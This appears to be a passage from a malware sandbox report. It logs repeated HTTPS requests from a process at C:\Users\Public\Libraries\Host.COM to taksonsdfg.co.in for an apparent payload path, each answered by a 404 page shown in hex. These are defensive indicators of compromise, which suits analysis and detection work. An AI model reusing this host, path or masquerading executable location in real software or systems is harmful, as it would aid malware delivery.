                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:33 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.449762108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:34 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:34 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:34 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:34 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:34 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.449765108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:35 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:35 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:35 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:35 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:35 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.449767108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:36 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:36 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:36 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:36 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:36 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.449769108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:37 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:37 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:37 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:37 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:37 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.449771108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:38 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:38 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:38 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:38 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:38 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.449773108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:39 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:39 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:39 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:39 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:39 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.449775108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:40 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:41 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:40 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:41 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:41 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
